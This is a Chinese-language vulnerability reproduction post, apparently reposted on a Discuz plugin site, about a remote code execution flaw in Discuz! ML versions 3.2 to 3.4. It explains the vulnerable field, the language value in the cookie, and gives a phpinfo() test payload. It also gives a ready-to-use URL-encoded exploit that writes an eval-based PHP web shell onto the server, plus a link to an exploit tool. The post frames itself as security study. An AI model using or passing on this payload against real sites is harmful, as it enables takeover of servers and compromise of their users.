"/>
·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
DZ插件网 门户 网站安全 查看内容

Discuz! ML 3.X RCE

2022-1-8 20:57| 发布者: admin| 查看: 323| 评论: 0|原作者: 余生安全团队

摘要: 1. 漏洞说明1.1 漏洞介绍Discuz!ML 是一个由 CodersClub.org 创建的多语言,集成,功能齐全的开源网络平台, 用于构建像「社交网络」这样的互联网社区。Discuz! ML 存在任意代码执行漏洞。该漏洞存在于请求流量中的 coo ...

1. 漏洞说明

1.1 漏洞介绍

Discuz!ML 是一个由 CodersClub.org 创建的多语言,集成,功能齐全的开源网络平台, 用于构建像「社交网络」这样的互联网社区。

Discuz! ML 存在任意代码执行漏洞。该漏洞存在于请求流量中的 cookie 参数中的 language 字段,攻击者能够利用该漏洞在请求流量的 cookie 字段中(language 参数)插入任意代码,最终执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。

1.2 影响版本

Discuz!ML v.3.4 Discuz!ML v.3.3 Discuz!ML v.3.2

以上版本均由 codersclub.org 发行

2. 漏洞环境

直接去官网 http://discuz.ml/download 下载,但貌似现在官方域名正在被出售。

也可以去 https://sourceforge.net/projects/discuz-ml/ 这里下载,注意看版本号。

链接: https://pan.baidu.com/s/17v2uKDvoeWw1vriaS-woDg  密码: ahov

3. 环境搭建

将压缩包解压至 phpstudy 网站根目录,浏览器访问 upload 目录即可开始安装。

一直默认下一步,输入相关信息就安装完成了。

访问首页 http://192.168.187.130/discuz3.4-ml/upload/ 可以看到网站底部有版本说明。

4. 漏洞复现

4.1 漏洞验证

访问网站抓取数据包,将 Cookie 中的 xxxxx_language 参数值改为 '.phpinfo().' ,可以看到成功执行了代码

4.2 GetShell

使用 file_put_contents() 函数写入 shell 文件

EXP:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

可以看到网站目录下多了一个 shell.php 文件

4.3 检测工具

https://github.com/ianxtianxt/discuz-ml-rce#discuz-ml-rce

该文章仅供安全学习,切勿用作非法用途,一切后果自负!



上一篇:Github 入狱教程,远离这个内卷社会!
下一篇:Discuz科技自媒体资讯类网站主题模板Startupidea

鲜花

握手

雷人

路过

鸡蛋

评论

您需要登录后才可以发表言论 登录立即注册
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.217.118.7,GMT+8, 2024-11-23 16:50 , Processed in 0.118377 second(s), 47 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部